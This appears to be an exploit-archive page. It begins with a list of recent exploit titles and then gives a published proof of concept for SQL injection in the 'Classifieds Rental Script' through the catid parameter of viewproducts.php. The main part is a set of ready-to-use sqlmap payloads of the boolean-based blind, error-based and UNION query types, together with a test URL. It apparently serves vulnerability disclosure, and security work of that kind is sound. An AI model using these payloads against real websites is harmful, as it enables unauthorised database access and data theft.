07fdc778ee
24 new exploits NetAuctionHelp 4.1 - search.asp SQL Injection Apple Mac OSX 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution Microsoft Edge - Array.map Heap Overflow (MS16-119) Microsoft Jet Database Engine - '.MDB' File Parsing Remote Buffer Overflow Microsoft Edge - Array.join Info Leak (MS16-119) Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124) Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124) HikVision Security Systems - Activex Buffer Overflow Oracle Netbeans IDE 8.1 - Directory Traversal MiCasa VeraLite - Remote Code Execution Oracle BI Publisher 11.1.1.6.0 / 11.1.1.7.0 / 11.1.1.9.0 / 12.2.1.0.0 - XML External Entity Injection Classifieds Rental Script - SQL Injection SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service SAP Adaptive Server Enterprise 16 - Denial of Service Event Calendar PHP 1.5 - SQL Injection SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal SPIP 3.1.2 - Cross-Site Request Forgery Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120) Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120) Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124) Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123) Microsoft Edge - Function.apply Info Leak (MS16-119) Microsoft Edge - Spread Operator Stack Overflow (MS16-119) Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118) Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118) Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124) Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit) OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)
26 lines
No EOL
1.1 KiB
Text
Executable file
26 lines
No EOL
1.1 KiB
Text
Executable file
# Exploit Title: SQL Injection in Classifieds Rental Script
|
|
# Date: 19 October 2016
|
|
# Exploit Author: Arbin Godar
|
|
# Website : ArbinGodar.com
|
|
# Vendor: www.i-netsolution.com
|
|
|
|
*----------------------------------------------------------------------------------------------------------------------*
|
|
|
|
# Proof of Concept SQL Injection/Exploit :
|
|
http://localhost/[PATH]/viewproducts.php?catid=PoC%27
|
|
|
|
# Exploit (using Sqlmap)
|
|
---
|
|
Parameter: catid (GET)
|
|
Type: boolean-based blind
|
|
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
|
|
Payload: catid=-1285' OR 8060=8060#
|
|
|
|
Type: error-based
|
|
Title: MySQL OR error-based - WHERE or HAVING clause
|
|
Payload: catid=-9700' OR 1 GROUP BY CONCAT(0x717a627071,(SELECT (CASE WHEN (7055=7055) THEN 1 ELSE 0 END)),0x716a767871,FLOOR(RAND(0)*2)) HAVING MIN(0)#
|
|
|
|
Type: UNION query
|
|
Title: MySQL UNION query (random number) - 1 column
|
|
Payload: catid=-4664' UNION ALL SELECT CONCAT(0x717a627071,0x444c6a6547574179515a64414752636446697064764a5a64745042625072666b5954674a58484577,0x716a767871)#
|
|
--- |